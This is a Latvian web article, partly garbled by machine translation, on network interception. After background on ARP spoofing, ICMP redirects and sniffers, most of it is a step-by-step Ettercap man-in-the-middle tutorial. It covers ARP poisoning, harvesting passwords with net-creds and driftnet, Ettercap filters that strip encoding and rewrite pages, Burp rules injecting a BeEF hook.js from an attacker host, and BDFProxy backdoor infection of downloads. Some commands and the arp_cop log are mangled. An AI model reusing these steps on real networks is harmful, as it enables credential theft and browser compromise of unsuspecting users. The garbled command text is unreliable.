mājas › Uzstādīšana un konfigurēšana › Hakeri to izmanto, lai novirzītu trafiku. Hakeru uzbrukumu metodes. Datu viltošana ar Burp

Hakeri to izmanto, lai novirzītu trafiku. Hakeru uzbrukumu metodes. Datu viltošana ar Burp

Tīkla trafika pārtveršanas metodes

Tīkla klausīšanās, izmantojot tīkla analizatora programmas, ir pirmā, lielākā daļa vienkāršā veidā datu pārtveršana.

Lai aizsargātu pret tīkla noklausīšanos, izmantojiet īpašas programmas, piemēram, AntiSniff, kas spēj identificēt tīklā esošos datorus, kas klausās tīkla trafiku.

Lai atrisinātu savas problēmas, antisniffer programmas izmanto īpašu noklausīšanās ierīču klātbūtnes zīmi tīklā - sniffer datora tīkla kartei ir jābūt īpašā klausīšanās režīmā. Klausīšanās režīmā tīkla datori īpašā veidā reaģē uz IP datagrammām, kas tiek nosūtītas uz testējamo resursdatoru. Piemēram, noklausīšanās resursdatori parasti apstrādā visu ienākošo trafiku, nevis tikai uz resursdatora adresi nosūtītās datagrammas. Ir arī citas pazīmes, kas norāda uz aizdomīgu saimniekdatora uzvedību, ko AntiSniff var atpazīt.

Neapšaubāmi, noklausīšanās no uzbrucēja viedokļa ir ļoti noderīga, jo ļauj iegūt daudz noderīgas informācijas - tīklā pārraidītās paroles, tīkla datoru adreses, konfidenciālus datus, vēstules utt. Tomēr vienkārša noklausīšanās neļauj hakeram traucēt tīkla saziņu starp diviem resursdatoriem, lai modificētu un bojātu datus. Lai atrisinātu šādu problēmu, ir nepieciešama sarežģītāka tehnoloģija.

Rīsi. 1 viltus ARP pieprasījums

Apskatīsim, kā hakeris var izmantot ARP, lai pārtvertu tīkla sakarus starp resursdatoriem A un B.

Lai pārtvertu tīkla trafiku starp resursdatoriem A un B, hakeris šiem resursdatoriem uzliek savu IP adresi, lai A un B izmantotu šo viltoto IP adresi, apmainoties ar ziņojumiem. Lai uzspiestu savu IP adresi, hakeris veic šādas darbības.

Uzbrucējs nosaka resursdatoru A un B MAC adreses, piemēram, izmantojot W2RK pakotnes komandu nbtstat.
Uzbrucējs uz identificētajām resursdatoru A un B MAC adresēm nosūta ziņojumus, kas ir viltotas ARP atbildes uz pieprasījumiem atrisināt saimniekdatoru IP adreses uz datoru MAC adresēm. Resursdators A tiek informēts, ka resursdatora B IP adrese atbilst uzbrucēja datora MAC adresei; resursdators B tiek informēts, ka resursdatora A IP adrese atbilst arī uzbrucēja datora MAC adresei.
Saimniekdatori A un B glabā saņemtās MAC adreses savās ARP kešatmiņās un pēc tam izmanto tās, lai nosūtītu ziņojumus viens otram. Tā kā IP adreses A un B atbilst uzbrucēja datora MAC adresei, resursdatori A un B, nenojaušot, sazinās ar starpnieka starpniecību, kas var darīt visu ar saviem ziņojumiem.

Lai aizsargātu pret šādiem uzbrukumiem, tīkla administratoriem ir jāuztur datu bāze ar atbilstības tabulu starp viņu tīkla datoru MAC adresēm un IP adresēm.

UNIX tīklos šāda veida viltotu ARP pieprasījumu uzbrukumu var īstenot, izmantojot sistēmas utilītas tīkla trafika uzraudzībai un pārvaldībai, piemēram, arpredirect. Diemžēl šķiet, ka šādas uzticamas utilītas nav ieviestas Windows tīklos. Piemēram, vietnē NTsecurity varat lejupielādēt utilītu GrabitAII, kas tiek piedāvāts kā rīks trafika novirzīšanai starp tīkla resursdatoriem. Tomēr GrabitAII utilīta funkcionalitātes pamata pārbaude parāda, ka līdz pilnīgai veiksmei tās funkciju ieviešanā vēl ir tālu.

Lai pārtvertu tīkla trafiku, uzbrucējs var izkrāpt tīkla maršrutētāja patieso IP adresi ar savu IP adresi, piemēram, izmantojot viltotus ICMP novirzīšanas ziņojumus. Resursdatoram A saskaņā ar RFC-1122 ir jāuztver saņemtais pāradresācijas ziņojums kā atbilde uz citam resursdatoram nosūtītu datagrammu, piemēram, B. Resursdators A nosaka savas darbības pāradresācijas ziņojumā, pamatojoties uz saņemtā Redirect ziņojuma saturu. un, ja Datagrammas novirzīšana ir norādīta sadaļā Novirzīt no A uz B pa jaunu maršrutu, tas ir tieši tas, ko darīs resursdators A.

Rīsi. 2 Viltus maršrutēšana

Lai veiktu viltus maršrutēšanu, uzbrucējam ir jāzina daži dati par organizāciju lokālais tīkls, kurā atrodas resursdators A, jo īpaši tā maršrutētāja IP adrese, caur kuru trafiks tiek sūtīts no resursdatora A uz B. To zinot, uzbrucējs ģenerēs IP datagrammu, kurā sūtītāja IP adrese ir definēta kā maršrutētāja IP adrese. adrese, un adresāts ir norādīts resursdators A. Datagrammā ir iekļauts arī ICMP Redirect ziņojums, kurā jaunā maršrutētāja adreses lauks ir iestatīts uz uzbrucēja datora IP adresi. Saņemot šādu ziņojumu, resursdators A nosūtīs visus ziņojumus uz uzbrucēja datora IP adresi.

Lai aizsargātu pret šādu uzbrukumu, jums ir jāatspējo (piemēram, izmantojot ugunsmūri) ICMP Redirect ziņojumu apstrāde resursdatorā A, un komanda tracert (Unix šī ir tracerout komanda) var atklāt uzbrucēja datora IP adresi. . Šīs utilītas spēj atrast papildu maršrutu, kas ir parādījies lokālajā tīklā, kas nebija paredzēts instalēšanas laikā, ja vien, protams, tīkla administrators nav modrs.

Iepriekš minētie pārtveršanas piemēri (kuriem uzbrucēju iespējas nebūt nav ierobežotas) pārliecina par nepieciešamību aizsargāt tīklā pārsūtītos datus, ja tajos ir konfidenciāla informācija. Vienīgā aizsardzības metode pret tīkla trafika pārtveršanu ir tādu programmu izmantošana, kas ievieš kriptogrāfiskus algoritmus un šifrēšanas protokolus un novērš slepenas informācijas izpaušanu un aizstāšanu. Lai atrisinātu šādas problēmas, kriptogrāfija nodrošina līdzekļus, lai šifrētu, parakstītu un pārbaudītu ziņojumu autentiskumu, izmantojot drošus protokolus.

Visu informācijas apmaiņas aizsardzības kriptogrāfijas metožu praktisku ieviešanu nodrošina VPN tīkli(Virtuālais privātais tīkls — virtuālie privātie tīkli).

TCP savienojuma pārtveršana

Par vismodernāko tīkla trafika pārtveršanas uzbrukumu ir jāuzskata TCP savienojuma uztveršana (TCP nolaupīšana), kad hakeris pārtrauc pašreizējo saziņas sesiju ar resursdatoru, ģenerējot un nosūtot TCP paketes uzbrukuma resursdatoram. Pēc tam, izmantojot TCP protokola spēju atjaunot pārtrauktu TCP savienojumu, hakeris pārtver pārtraukto sakaru sesiju un turpina to atvienotā klienta vietā.

TCP protokols (Transmission Control Protocol) ir viens no pamata transporta protokoliem. OSI līmenis, kas ļauj izveidot loģiskus savienojumus, izmantojot virtuālo sakaru kanālu. Pa šo kanālu tiek pārsūtītas un saņemtas paketes ar ierakstītu to secību, tiek kontrolēta pakešu plūsma, organizēta izkropļoto pakešu retranslācija, un sesijas beigās sakaru kanāls tiek pārtraukts. TCP ir vienīgais protokols pamata protokols no TCP/IP saimes, kurai ir uzlabota ziņojumu identifikācijas un savienojuma sistēma.

Programmatūras pakešu snifferu pārskats

Visus programmatūras sniferus var iedalīt divās kategorijās: sniferi, kas atbalsta palaišanu no komandrinda, un sniffers ar grafisko interfeisu. Tomēr mēs atzīmējam, ka ir sniffers, kas apvieno abas šīs iespējas. Turklāt sniffers atšķiras viens no otra ar atbalstītajiem protokoliem, pārtverto pakešu analīzes dziļumu, spēju konfigurēt filtrus un saderības iespēju ar citām programmām.

Parasti logs jebkura sniffer ar grafiskais interfeiss sastāv no trim zonām. Pirmais no tiem parāda pārtverto pakešu kopsavilkuma datus. Parasti šajā apgabalā ir redzams minimālais lauks, proti: pakešu pārtveršanas laiks; pakešu sūtītāja un saņēmēja IP adreses; paketes sūtītāja un saņēmēja MAC adreses, avota un mērķa portu adreses; protokola veids (tīkla, transporta vai lietojumprogrammas slānis); dažas kopsavilkuma ziņas par pārtvertajiem datiem. Otrajā apgabalā tiek parādīta statistikas informācija par atsevišķu atlasīto pakotni, un visbeidzot trešajā apgabalā tiek parādīta pakotne heksadecimālā vai ASCII rakstzīmju formā.

Gandrīz visi pakešu sniffers ļauj analizēt dekodētās paketes (tāpēc pakešu sniffers sauc arī par pakešu analizatoriem vai protokolu analizatoriem). Sniffer sadala pārtvertās paketes pa slāņiem un protokoliem. Daži pakešu sniffers spēj atpazīt protokolu un parādīt uzņemto informāciju. Šāda veida informācija parasti tiek parādīta sniffer loga otrajā apgabalā. Piemēram, jebkurš snifers var atpazīt TCP protokolu, un uzlaboti sniferi var noteikt, kura lietojumprogramma ģenerēja šo trafiku. Lielākā daļa protokolu analizatoru atpazīst vairāk nekā 500 dažādus protokolus un var tos aprakstīt un atšifrēt pēc nosaukuma. Jo vairāk informācijas sniferis var atšifrēt un parādīt ekrānā, jo mazāk būs jāatšifrē manuāli.

Viena problēma, ar kuru var saskarties pakešu sniffers, ir nespēja pareizi identificēt protokolu, izmantojot citu portu, nevis noklusējuma portu. Piemēram, lai uzlabotu drošību, dažas labi zināmas lietojumprogrammas var būt konfigurētas, lai izmantotu portus, kas nav noklusējuma porti. Tātad tradicionālā 80. porta vietā, kas rezervēts tīmekļa serverim, šis serveris Varat to piespiedu kārtā pārkonfigurēt uz portu 8088 vai jebkuru citu. Daži pakešu analizatori šajā situācijā nespēj pareizi noteikt protokolu un parādīt tikai informāciju par zemākā līmeņa protokolu (TCP vai UDP).

Ir programmatūras sniffers, kas ir aprīkoti ar programmatūras analītiskajiem moduļiem kā spraudņiem vai iebūvētiem moduļiem, kas ļauj izveidot pārskatus ar noderīgu analītisko informāciju par pārtverto trafiku.

Vēl viena raksturīga iezīme lielākajai daļai programmatūras pakešu analizatoru ir iespēja konfigurēt filtrus pirms un pēc trafika uztveršanas. Filtri atlasa noteiktas paketes no vispārējās trafika atbilstoši noteiktam kritērijam, kas ļauj atbrīvoties no nevajadzīgas informācijas, analizējot trafiku.

Alternatīvas Ettercap

Ettercap ir vispopulārākā vidēja uzbrukuma programmatūra, bet vai tā ir labākā? Visā instrukcijā jūs redzēsiet, ka Ettercap gandrīz nekad netiek izmantots viens pats, ka viena vai otra programma vienmēr tiek veidota ar to trafika apstrādes ķēdē. Varbūt tas palielina elastību, kopumā šāda pieeja ir UNIX pamatā - viena programma veic vienu uzdevumu, un gala lietotājs apvieno dažādas programmas, lai sasniegtu vēlamo rezultātu. Izmantojot šo pieeju, programmas kodu ir vieglāk uzturēt, no šādiem miniatūriem “ķieģeļiem” var izveidot jebkuras sarežģītības un elastības sistēmu. Tomēr piecas atvērtas konsoles ar dažādiem uzdevumiem, kuru darbs ir vērsts uz viena rezultāta sasniegšanu, nav īpaši ērti, tas ir vienkārši sarežģītāk, pastāv iespēja kādā posmā kļūdīties, un viss konfigurēts. sistēma darbosies veltīgi.

Net-Creds šņaukāties:

Apmeklētie URL
POST pieprasījumi nosūtīti
pieteikšanās/paroles no HTTP veidlapām
pieteikumvārdi/paroles pamata HTTP autentifikācijai
HTTP meklējumi
FTP pieteikšanās/paroles
IRC pieteikšanās/paroles
POP pieteikšanās/paroles
IMAP pieteikšanās/paroles
Telnet pieteikšanās/paroles
SMTP pieteikšanās/paroles
SNMP kopienas virkne
visi atbalstītie NTLMv1/v2 protokoli, piemēram, HTTP, SMB, LDAP utt.
Kerberos

Laba pārtverto izlase, un drifttīkls šajā ziņā ir vienkāršāks — tas parāda tikai pārtvertos attēlus.

Pārslēdziet ierīci uz pārsūtīšanas režīmu.

Atbalss "1" > /proc/sys/net/ipv4/ip_forward

Palaidiet Ettercap ar grafisko interfeisu (-G):

Ettercap-G

Tagad atlasiet Hosts, ir apakšvienums Meklēt saimniekus. Kad skenēšana ir pabeigta, atlasiet Saimniekdatoru saraksts:

Kā Target1 atlasiet maršrutētāju (Pievienot 1. mērķim), kā Target2 atlasiet ierīci, kurai uzbruksit (Pievienot 2. mērķim).

Bet šeit var rasties pirmā aizķeršanās, it īpaši, ja ir daudz saimnieku. Dažādās instrukcijās, tostarp iepriekš parādītajā videoklipā, autori iekāpj mērķa mašīnā (visiem kaut kādu iemeslu dēļ ir Windows) un, izmantojot komandu, aplūko šīs mašīnas IP lokālajā tīklā. Piekrītu, šī iespēja ir nepieņemama reālos apstākļos.

Ja skenējat, izmantojot , varat to iegūt Papildus informācija par saimniekiem, precīzāk, par tīkla kartes ražotāju:

Nmap -sn 192.168.1.0/24

Ja datu joprojām nav pietiekami, varat veikt skenēšanu, lai noteiktu OS:

Nmap -O 192.168.1.0/24

Kā redzam, mašīna ar IP 192.168.1.33 izrādījās Windows, ja šī nav zīme no augšas, tad kas tas ir? 😉 LOL

Tas ir tas, ko mēs pievienojam kā otro mērķi.

Tagad dodieties uz izvēlnes vienumu Mitm. Tur atlasiet ARP saindēšanās... Atzīmējiet izvēles rūtiņu Sniff remote connections.

Mēs sākam novākt ražu, vienā logā mēs palaižam

Neto kredīti

citā (abas programmas var palaist bez opcijām)

Drifttīkls

Datu vākšana sākās nekavējoties:

Labajā pusē driftnet ir atvēris vēl vienu logu, kurā tas parāda pārtvertos attēlus. Net-creds logā mēs redzam apmeklētās vietnes un pārtvertās paroles:

1.2 Ettercap + Burp Suite
3. Skatiet datus (apmeklētās vietnes un uzņemtās paroles) pakalpojumā Ettercap

Izvēlnē Skats mums ir piekļuve cilnēm Savienojumi un Profili. Varat arī atzīmēt izvēles rūtiņu Atrisināt IP adreses. Savienojumi, protams, ir savienojumi. Ettercap savāc profilus atmiņā katram resursdatoram, ko tas atklāj. Tur tiek apkopoti lietotāji un paroles. Šajā gadījumā profili ar tvertajiem konta datiem (parolēm) ir atzīmēti ar krustiņu:

Nav nepieciešams pārāk paļauties uz profiliem - piemēram, tiek atzīmēti pārtvertie pieteikumvārdi un paroles FTP un citiem pakalpojumiem, kuriem programma var skaidri interpretēt saņemto informāciju kā akreditācijas datus. Tas neietver, piemēram, pamata autentifikācijas datus, pieteikumvārdus un paroles, kas ievadītas tīmekļa veidlapās.

Savienojumos visdaudzsološākie dati ir atzīmēti ar zvaigznīti:

Varat veikt dubultklikšķi uz šiem ierakstiem, lai skatītu sīkāku informāciju:

Lai nemeklētu šīs zvaigznes visā sarakstā, varat kārtot pēc šī lauka, un tās visas parādīsies augšā vai apakšā:

Noķerta pamata autentifikācija:

Yandex pieteikšanās parole (izcelta zemāk):

Šie ir pārtvertie VKontakte akreditācijas dati:

Arī interesantākie dati tiek apkopoti apakšējā konsolē:

Ja vēlaties saglabāt programmas rezultātus, izmantojiet šīs opcijas (norādiet taustiņus, startējot Ettercap:

Reģistrācijas opcijas: -w, --write rakstīt uzņemtos datus pcapfile -L, --log rakstīt visu trafiku uz šo -l, --log-info rakstīt tikai pasīvo informāciju uz šo -m, --log-msg rakstīt visus ziņojumus šajā -c, --compress izmanto gzip saspiešanu žurnālfailiem

4. Datu aizstāšana lidojuma laikā pakalpojumā Ettercap
4.1. Ettercap pielāgoto filtru izmantošana

Piezīme. Neskatoties uz visu testēšanu, Ettercap filtri man joprojām nedarbojās. Grūti saprast, vai runa ir par rokām, aparatūras funkcijām vai pašas programmas kļūdu... Bet versijai 0.8.2 (pašlaik jaunākā) ir kļūdu ziņojums par problēmām ar filtriem. Kopumā, spriežot pēc kļūdu ziņojumiem un forumiem, filtri vai nu bieži nokrīt, vai arī ilgu laiku nedarbojas vispār. Ir filiāle, kurā pirms 5 mēnešiem veiktas izmaiņas https://github.com/Ettercap/ettercap/tree/filter-improvements, t.i. filtru uzlabojumi (ar filtru uzlabojumiem). Gan šai filiālei, gan versijai no repozitorija tika veikti ļoti dažādi testi, tika pārbaudīti dažādi filtri dažādos apstākļos, tika pavadīts daudz laika, bet rezultāta nebija. Starp citu, lai Kali Linux instalētu filtra uzlabojumu versiju, jums jādara šādi:

Sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison check cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev-dev-libncur libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build ENDF DOCS_ mkdir build ENCS =Ieslēgts ../ make sudo make install

Kopumā, ja jūsu filtri nedarbojas, jūs neesat viens. Instrukcijās par Ettercap es nevaru izlaist tēmu par filtriem, tāpēc tie tiks apspriesti jebkurā gadījumā.

Līdz šim mēs esam izmantojuši Ettercap ARP viltošanai. Šis ir ļoti virspusējs lietojums. Pateicoties pielāgotajiem filtriem, mēs varam iejaukties un mainīt satiksmi lidojuma laikā. Filtri jāiekļauj atsevišķos failos, un pirms lietošanas tie ir jāapkopo, izmantojot programmu Etterfilter. Lai gan dokumentācija, uz kuru ir dota saite, šķiet niecīga, taču kopā ar tālāk sniegtajiem piemēriem tas ļaus jums izveidot diezgan interesantus filtrus.

Izveidosim savu pirmo filtru, tas aizstās visus attēlus ar šo:

Failā ar nosaukumu img_replacer.filter copy:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) (aizvietot("Accept-Encoding", "Accept-Rubbish!"); # piezīme: aizstāšanas virknei ir tāds pats garums kā oriģinālajai msg("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( aizstāt("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); aizstāt ("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); aizstāt("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); aizstāt ("SRC =", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filtra diapazons.\n"); )

Apkopojiet failu:

Etterfilter img_replacer.filter -o img_replacer.ef

Apkopošanas rezultāti:

Etterfilter 0.8.2 autortiesības 2001-2015 Ettercap Development Team ielādētas 14 protokolu tabulas: DECODED DATA udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth Ielādētas 13 konstantes: VRRP OSPF GRE UDP avota fails Par IPTP6 TCP PPPOMP ICPP. "img_replacer.filter" ir pabeigts. Meta koka atlocīšana paveikta. Etiķešu pārvēršana reālās nobīdēs ir pabeigta. Izvades ierakstīšana uz "img_replacer.ef" ir pabeigta. -> Skripts, kas kodēts 18 instrukcijās.

Slēdzis -F liek programmai ielādēt filtru no faila, kas seko slēdzim. Pēc kompilācijas mūsu jaunā faila ar filtru nosaukums ir img_replacer.ef, tāpēc komandai ir šāda forma:

Ettercap -G -F img_replacer.ef

Piezīme. Pārraugot tīmekļa trafiku, redzamās paketes var būt šifrētā veidā. Priekš efektīvs darbs filtri, Ettercap ir nepieciešama trafika formā vienkāršs teksts. Saskaņā ar dažiem novērojumiem tīmekļa lapās izmantotais kodēšanas veids ir "Accept-Encoding: gzip, deflate"

Zemāk ir filtrs, kas pārraksta kodējumu, liekot sazināties vienkārša teksta veidā:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) (aizvietot("gzip", " "); # piezīme: četras atstarpes aizstātajā virknē msg ("izbalināts gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) (aizvietot("deflate", " "); # piezīme: septiņas atstarpes aizstātajā rindā msg("whited out deflate\n"); ) )

Filtru rakstīšanas sintakse ir detalizēti aprakstīta, un tad ir vēl daži piemēri:

# teksta aizstāšana paketē: if (ip.proto == TCP && search(DATA.data, "lol"))( aizstāt("lol", "smh"); msg("filtrs skrēja"); ) # rādīt ziņojums , ja tcp ports ir 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH pakete\n"); ) ) # pierakstīt visu telnet trafiku, arī izpildiet ./program katrai paketei if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./ logfile.log "); exec("./program"); ) ) # reģistrēt visu trafiku, izņemot http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log (DATA.data , "./logfile.log"); ) # dažas operācijas ar pakešu lietderīgo slodzi if (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = " modificēts"; DATA .data + 20 = 0x4445; ) # nomest visas paketes, kas satur "ettercap" if (search(DECODED.data, "ettercap")) ( msg("kāds runā par mums...\n") ; drop( ); kill(); ) # ierakstīt atšifrētās ssh paketes, kas atbilst regulārajai izteiksmei if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # nogalina paketes if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2. Datu aizstāšana, izmantojot Burp

Mēs palaižam Ettercap un Burp, kā aprakstīts 1.2. punktā vai 2.2. punktā.

Programmā Burp dodieties uz Starpniekserveri -> Opcijas. Mēs tur atrodam Match and Replace. Noklikšķiniet uz Pievienot, lai pievienotu jaunu noteikumu.

Pieprasījuma galvene ir pieprasījuma galvene
Pieprasījuma struktūra — pieprasījuma struktūra
Atbildes galvene — atbildes galvene
Atbildes ķermenis - atbildes ķermenis
Pieprasījuma parametra nosaukums — Pieprasīt parametra nosaukumu
Pieprasīt parametra vērtību — pieprasīt parametra vērtību
Pieprasījuma pirmā rindiņa — pieprasījuma pirmā rinda

Ja jums ir jāmaina ar GET metodi pārsūtītie dati, tas attiecas uz galvenēm.

HTML iezīmēšanā ir arī tāda lieta kā galva (galvas tags). Tiem, kas minēti tikai iepriekš, nav nekāda sakara ar šo nosaukumu. Nedaudz augstāk mēs runājam par pakešu galvenēm. Ja vēlaties mainīt saturu HTML lapas, tad vienmēr ir jāatlasa atbildes pamatteksts, nevis Pieprasījuma galvene, pat ja plānojat mainīt head tagu saturu (piemēram, virsrakstu).

Ja neesat pazīstams ar regulāras izteiksmes, tad principā nav par ko uztraukties: HTML daudz ko piedod, un to, ko tas nesaprot, tas vienkārši ignorē - jūs varat to izmantot. Ja jūs zināt, kā lietot regulāras izteiksmes, tad es jūs cienu.)))

Piemēram, izveidosim jaunu kārtulu, mainot pieprasījuma galveni uz atbildes pamattekstu. Pašā noteikumā mēs mainīsimies

Nav virsraksta

Atzīmējiet Regex atbilstības lodziņu.

Tagad visās vietnēs (bez HTTPS) nosaukums būs Bez nosaukuma:

Ievietojiet patvaļīgu rindiņu aiz body tag (tā būs pirmā rindiņa tekstā). Pieprasījuma galvene ir mainīta uz atbildes pamattekstu. Mēs maināmies

Atzīmējiet Regex atbilstības lodziņu.

Augšējā labajā stūrī (atkarībā no izkārtojuma) parādās uzraksts “I am cool!”. Jūs varat ievietot CSS, JavaScript kodu, jebkuru tekstu - jebko. Parasti varat noņemt visu no lapas un pēc tam aizpildīt to ar savu saturu — tas viss ir atkarīgs no jūsu iztēles.

Ideja bija nedaudz modificēt katru veidlapu, lai dati tiktu nosūtīti uz sākotnējo serveri un uzbrucēja serveri (katrai veidlapai ieviesiet vairāku iesniegšanu). Bet, pamatojot, ka, ja pārsūtītie dati nav šifrēti un mums tiem ir piekļuve, tad mēs to jau redzam, nav nepieciešams tos sūtīt nevienam serverim. Taču, ja kādam vajadzīgs reāli darbojošs piemērs datu nosūtīšanai no vienas formas uz vairākiem serveriem vienlaikus.

5. Savienojums ar liellopu gaļu

Lai sāktu izmantot BeEF iespējas, mums HTML kodā ir jāievieto JavaScript fails, parasti šāda rinda:

Nākamās divas metodes atšķiras tikai ar šīs virknes iegulšanas metodi.

5.1. Liellopu gaļas pievienošana, izmantojot Ettercap filtrus

[sadaļa tiks sagatavota vēlāk]

5.2 Liellopu gaļas pievienošana ar Burp

Jums jāsāk tieši tā, kā rakstīts 4.2. punktā. Tikai tā vietā, lai aizstātu galvenes un pievienotu vietnei tekstu, mēs ieviesīsim JavaScript kodu rindas veidā:

Manā gadījumā šis fails ir pieejams IP 192.168.1.36 portā 3000. Faila nosaukums ir hook.js (var mainīt iestatījumos). Tie. manā gadījumā man jāinjicē līnija:

To var izdarīt, piemēram, izveidojot jaunu kārtulu, mainot Pieprasījuma galveni uz Atbildes pamattekstu. Aizstāšanai ir jānotiek pašā HTML kodā

Lieliski, atverot jebkuru vietni, kurā nav HTTPS, HTML kodā tiek ievietots JavaScript kods, kas ļauj ievākt informāciju, izmantojot iekarinātu pārlūkprogrammu, un veikt dažādus uzbrukumus:

6. Inficēšanās ar aizmugures durvīm

Varat aizstāt un inficēt izpildāmos failus, izmantojot gan Ettercap filtrus [kas kaut kādu iemeslu dēļ vairs nedarbojas], gan trešo pušu lietojumprogrammas. Piemēram, BDFProxy to var izdarīt lidojuma laikā. Diemžēl BDFProxy joprojām ir noguris no 2016. gada aprīļa Backdoor Factory atjauninājuma: libmproxy pakotne Python tika pārdēvēta par mitmproxy. BDFProxy pakotne libmproxy ir nepieciešama atkarība; bez šīs pakotnes programma netiks startēta. Tāpēc tagad, pirms BDFProxy “remonta”, to nav iespējams izmantot, jo pat ar instalētu Backdoor Factory programma BDFProxy sūdzas par libmproxy bibliotēkas neesamību...

Līdzīgu darbību var veikt ar Burp Suite. Tiek parādīts soli pa solim algoritms; šajā sadaļā nav jēgas to vēlreiz pārrakstīt.

7. Ettercap spraudņu izmantošana

Informāciju par Ettercap spraudņiem var atrast. Ir diezgan daudz spraudņu; tālāk aprakstītie man šķiet visinteresantākie.

Spraudņus var pieslēgt, kad tiek palaists Ettercap, tam ir šāda iespēja:

P, --plugin palaist šo

Spraudņus var ielādēt arī no GUI:

[MATERIĀLS GATAVOTOS]

7.1 arp_cop

Tas ziņo par aizdomīgām ARP darbībām, pasīvi uzraugot ARP pieprasījumus/atbildes. Tas var ziņot par ARP saindēšanās mēģinājumiem vai vienkāršiem IP konfliktiem vai IP izmaiņām. Ja veidojat sākotnējo saimniekdatoru sarakstu, spraudnis darbosies precīzāk.

Ettercap -TQP arp_cop //

Reālas ARP viltošanas atklāšanas piemērs:

Izvērst

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // parole mial: ettercap 0.8.2 autortiesības 2001-2015 Ettercap Development Team Klausīšanās: eth0 -> 08:00:27:A3:08:4A 192.3/168. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 SSL sadalīšanai failā etter.conf ir nepieciešams derīgs "redir_command_on" skripts. Privilēģijas ir samazinātas uz EUID 65534 EGID 65534... 33 macedc protocol dissector0 monitor20 pārdevēja pirkstu nospiedums 1766 tcp OS pirkstu nospiedums 2182 zināmie pakalpojumi 255 saimniekdatoru izlases noteikšana skenēšanai... Visas tīkla maskas skenēšana, lai atrastu 255 saimniekdatorus... * |====== =============== =============================>| 100.00 % Saimniekdatoru sarakstam pievienoti 3 saimnieki... Tiek sākta vienotā sniffing... Tikai teksts Interfeiss aktivizēts... Nospiediet "h", lai saņemtu palīdzību. Aktivizē spraudni arp_cop... arp_cop: spraudnis darbojas... arp_cop: (jauns resursdators ) 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.35 izliekas par 192.168.1.35 pretendēt uz 192.168.1.35 pretendēt s ir 192.168.1.1 arp_cop: ( BRĪDINĀJUMS ) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.35.1 pretends.6.1.1. p: (BRĪDINĀJUMS) 192.168.1.35 izliekas be 192.168 .1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.35 izliekas 192.168.1.35 pretendēt uz 192.168.1.1.1.6.2. s jābūt 192.1 68.1.1 arp_cop: ( BRĪDINĀJUMS) 192.168 .1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.35.1.16.1.1. p: (BRĪDINĀJUMS) 192.1 68.1.35 izliekas būt 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas 192.168.1.35) pretendēt uz 192.168.1.3.192.168.1.1.1. jābūt 192.168.1. 1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.35 izliekas par 192.168.1.1 arp_cop: (BRĪDINĀJUMS) 192.168.1.1 arp_cop.1 to bep_35 pretend2.1. : (BRĪDINĀJUMS) 192.168.1.3 5 izliekas būt 